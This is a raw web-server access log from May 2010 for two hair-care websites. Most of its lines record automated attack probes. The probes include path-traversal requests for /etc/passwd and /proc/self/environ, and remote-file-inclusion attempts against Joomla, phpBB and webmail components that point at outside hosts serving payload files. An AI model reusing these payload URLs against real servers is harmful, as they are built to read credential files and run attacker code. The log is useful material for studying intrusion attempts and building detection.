210.109.108.186 - - [30/May/2010:23:08:10 -0700] "GET /index2.php?option=3_plugin_twindow&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
194.100.228.237 - - [30/May/2010:23:08:20 -0700] "GET /index.php?option=com_performs&task=rss&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
194.100.228.237 - - [30/May/2010:23:08:22 -0700] "GET /index.php?option=com_performs&task=rss&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
69.94.106.71 - - [30/May/2010:23:09:33 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [30/May/2010:23:09:34 -0700] "GET /index.php?option=com_fabrik&controller=../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [30/May/2010:23:09:35 -0700] "GET /index.php?option=com_fabrik&controller=../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [30/May/2010:23:09:36 -0700] "GET /index.php?option=com_fabrik&controller=../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [30/May/2010:23:09:37 -0700] "GET /index.php?option=com_fabrik&controller=../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [30/May/2010:23:09:38 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [30/May/2010:23:09:39 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [30/May/2010:23:09:40 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [30/May/2010:23:09:41 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [30/May/2010:23:09:42 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [30/May/2010:23:09:43 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [30/May/2010:23:09:44 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [30/May/2010:23:09:45 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
194.100.228.237 - - [30/May/2010:23:13:48 -0700] "GET /logs/access_100412.log/index.php?option=com_performs&task=rss&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
194.100.228.237 - - [30/May/2010:23:13:48 -0700] "GET /index.php?option=com_performs&task=rss&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
194.100.228.237 - - [30/May/2010:23:13:48 -0700] "GET /logs/index.php?option=com_performs&task=rss&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
194.100.228.237 - - [30/May/2010:23:13:51 -0700] "GET /logs/access_100412.log/index.php?option=com_performs&task=rss&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
194.100.228.237 - - [30/May/2010:23:13:52 -0700] "GET /index.php?option=com_performs&task=rss&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
194.100.228.237 - - [30/May/2010:23:13:52 -0700] "GET /logs/index.php?option=com_performs&task=rss&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
189.108.172.26 - - [30/May/2010:23:14:56 -0700] "GET /logs/access_100208.log/!rfihttp://no.no-ip.com/images/ocer/php02.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
189.108.172.26 - - [30/May/2010:23:14:56 -0700] "GET /logs/access_100208.log/!rfihttp://no.no-ip.com/images/ocer/fako.txt?????? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
189.108.172.26 - - [30/May/2010:23:14:57 -0700] "GET /!rfihttp://no.no-ip.com/images/ocer/php02.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
189.108.172.26 - - [30/May/2010:23:14:59 -0700] "GET /!rfihttp://no.no-ip.com/images/ocer/fako.txt?????? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
189.108.172.26 - - [30/May/2010:23:14:59 -0700] "GET /logs/!rfihttp://no.no-ip.com/images/ocer/php02.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
189.108.172.26 - - [30/May/2010:23:15:00 -0700] "GET /logs/!rfihttp://no.no-ip.com/images/ocer/fako.txt?????? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
174.121.217.207 - - [30/May/2010:23:16:41 -0700] "GET /logs///language/lang_german/lang_main_album.php?phpbb_root_path=http://pitsounologos.com/pbox/ID1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.217.207 - - [30/May/2010:23:16:41 -0700] "GET //language/lang_german/lang_main_album.php?phpbb_root_path=http://pitsounologos.com/pbox/ID1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.217.207 - - [30/May/2010:23:16:42 -0700] "GET /logs/access_100412.log%20%20///language/lang_german/lang_main_album.php?phpbb_root_path=http://pitsounologos.com/pbox/ID1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:23:17:16 -0700] "GET /logs//journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:23:17:17 -0700] "GET /logs/access.log%20%20//journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:23:17:17 -0700] "GET /journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:23:17:34 -0700] "GET /logs/access.log%20%20//journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:23:17:34 -0700] "GET /journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:23:17:35 -0700] "GET /logs//journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:23:17:35 -0700] "GET /logs/access.log%20%20//journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:23:17:35 -0700] "GET /logs//journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:23:17:35 -0700] "GET /journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:23:17:42 -0700] "GET /journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:23:17:42 -0700] "GET /logs/access.log%20%20//journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:23:17:43 -0700] "GET /logs//journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:23:17:44 -0700] "GET /journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:23:17:44 -0700] "GET /logs/access.log%20%20//journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:23:17:44 -0700] "GET /logs//journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:23:18:09 -0700] "GET /journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:23:18:09 -0700] "GET /logs//journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:23:18:09 -0700] "GET /logs/access.log%20%20//journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:23:18:12 -0700] "GET /logs/access.log%20%20//journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:23:18:12 -0700] "GET /journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:23:18:12 -0700] "GET /logs//journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
119.63.193.75 - - [30/May/2010:23:18:30 -0700] "GET /freehairsecretsphp/viewtopic.php HTTP/1.1" 200 128 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "freehairsecrets.com"
81.92.204.67 - - [30/May/2010:23:18:32 -0700] "GET /logs/access_100308.log//journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:23:18:32 -0700] "GET /journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:23:18:32 -0700] "GET /logs//journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:23:18:33 -0700] "GET /journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:23:18:33 -0700] "GET /logs/access_100308.log//journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:23:18:33 -0700] "GET /logs//journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.149.207.129 - - [30/May/2010:23:19:54 -0700] "GET /index.php?option=com_fabrik&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
93.114.41.16 - - [30/May/2010:23:20:16 -0700] "GET /logs/access_100412.log//index2.php?otpion=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
93.114.41.16 - - [30/May/2010:23:20:16 -0700] "GET /index2.php?otpion=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
93.114.41.16 - - [30/May/2010:23:20:17 -0700] "GET /logs//index2.php?otpion=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
119.63.193.75 - - [30/May/2010:23:20:32 -0700] "GET /freehairsecretsphp/viewtopic.php?p=17234 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "freehairsecrets.com"
62.149.207.129 - - [30/May/2010:23:21:13 -0700] "GET /index.php?option=com_fabrik&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
62.149.207.129 - - [30/May/2010:23:26:11 -0700] "GET /logs/access_100503.log/index.php?option=com_fabrik&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
62.149.207.129 - - [30/May/2010:23:26:11 -0700] "GET /index.php?option=com_fabrik&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
62.149.207.129 - - [30/May/2010:23:26:12 -0700] "GET /logs/index.php?option=com_fabrik&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
208.115.111.245 - - [30/May/2010:23:27:19 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
174.121.217.207 - - [30/May/2010:23:27:26 -0700] "GET /logs/access_100412.log///language/lang_german/lang_main_album.php?phpbb_root_path=http://pitsounologos.com/pbox/ID1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:23:27:37 -0700] "GET /journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:23:27:37 -0700] "GET /logs//journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:23:27:37 -0700] "GET /logs/access.log%20%20//journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:23:27:43 -0700] "GET /logs//journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:23:27:43 -0700] "GET /journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:23:27:43 -0700] "GET /logs/access.log%20%20//journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
194.100.228.237 - - [30/May/2010:23:28:44 -0700] "GET /logs/access_100125.log/index.php?option=com_performs&task=rss&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
194.100.228.237 - - [30/May/2010:23:28:44 -0700] "GET /logs/access_100125.log/index.php?option=com_performs&task=rss&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
194.100.228.237 - - [30/May/2010:23:28:44 -0700] "GET /index.php?option=com_performs&task=rss&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
194.100.228.237 - - [30/May/2010:23:28:44 -0700] "GET /index.php?option=com_performs&task=rss&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
194.100.228.237 - - [30/May/2010:23:28:45 -0700] "GET /logs/index.php?option=com_performs&task=rss&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
194.100.228.237 - - [30/May/2010:23:28:45 -0700] "GET /logs/index.php?option=com_performs&task=rss&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
62.149.207.129 - - [30/May/2010:23:31:15 -0700] "GET /logs/access.log/index.php?option=com_fabrik&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
62.149.207.129 - - [30/May/2010:23:31:16 -0700] "GET /index.php?option=com_fabrik&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
62.149.207.129 - - [30/May/2010:23:31:16 -0700] "GET /logs/index.php?option=com_fabrik&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
75.136.121.230 - - [30/May/2010:23:31:27 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.136.121.230 - - [30/May/2010:23:31:27 -0700] "GET /logs/access_100322.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.136.121.230 - - [30/May/2010:23:31:27 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.136.121.230 - - [30/May/2010:23:31:38 -0700] "GET /logs/access_100322.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.136.121.230 - - [30/May/2010:23:31:40 -0700] "GET /logs/access_100322.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.136.121.230 - - [30/May/2010:23:31:40 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.136.121.230 - - [30/May/2010:23:31:40 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.136.121.230 - - [30/May/2010:23:31:40 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.128.84.14 - - [30/May/2010:23:32:59 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr/bbs/data/webtoon/idrose.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "growlonghairfast.com"
213.128.84.14 - - [30/May/2010:23:32:59 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr/bbs/data/webtoon/idrose.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "growlonghairfast.com"
213.128.84.14 - - [30/May/2010:23:32:59 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr/bbs/data/webtoon/idrose.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "growlonghairfast.com"
213.128.84.14 - - [30/May/2010:23:33:00 -0700] "GET /logs/access_100125.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr/bbs/data/webtoon/idrose.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "growlonghairfast.com"
194.100.228.237 - - [30/May/2010:23:33:14 -0700] "GET /logs/access_100412.log/index.php?option=com_performs&task=rss&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
194.100.228.237 - - [30/May/2010:23:33:14 -0700] "GET /logs/access_100412.log/index.php?option=com_performs&task=rss&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
75.136.121.230 - - [30/May/2010:23:33:28 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.136.121.230 - - [30/May/2010:23:33:28 -0700] "GET /logs/access_100322.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.136.121.230 - - [30/May/2010:23:33:28 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.128.84.14 - - [30/May/2010:23:33:32 -0700] "GET /logs/access_100125.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr/bbs/data/webtoon/idrose.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "growlonghairfast.com"
213.128.84.14 - - [30/May/2010:23:33:32 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr/bbs/data/webtoon/idrose.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "growlonghairfast.com"
213.128.84.14 - - [30/May/2010:23:33:37 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr/bbs/data/webtoon/idrose.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "growlonghairfast.com"
213.128.84.14 - - [30/May/2010:23:33:37 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr/bbs/data/webtoon/idrose.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "growlonghairfast.com"
77.88.25.28 - - [30/May/2010:23:37:32 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14103 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
210.109.108.186 - - [30/May/2010:23:39:28 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
210.109.108.186 - - [30/May/2010:23:39:29 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
216.7.185.19 - - [30/May/2010:23:41:10 -0700] "GET /logs//Madirish_Webmail/index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
216.7.185.19 - - [30/May/2010:23:41:11 -0700] "GET /Madirish_Webmail/index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
216.7.185.19 - - [30/May/2010:23:41:15 -0700] "GET /logs//Madirish_Webmail/index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
216.7.185.19 - - [30/May/2010:23:41:16 -0700] "GET /Madirish_Webmail/index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
77.88.25.28 - - [30/May/2010:23:43:53 -0700] "GET /logs/access_090629.log HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
216.7.185.19 - - [30/May/2010:23:44:09 -0700] "GET /logs/access_100503.log//Madirish_Webmail/index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
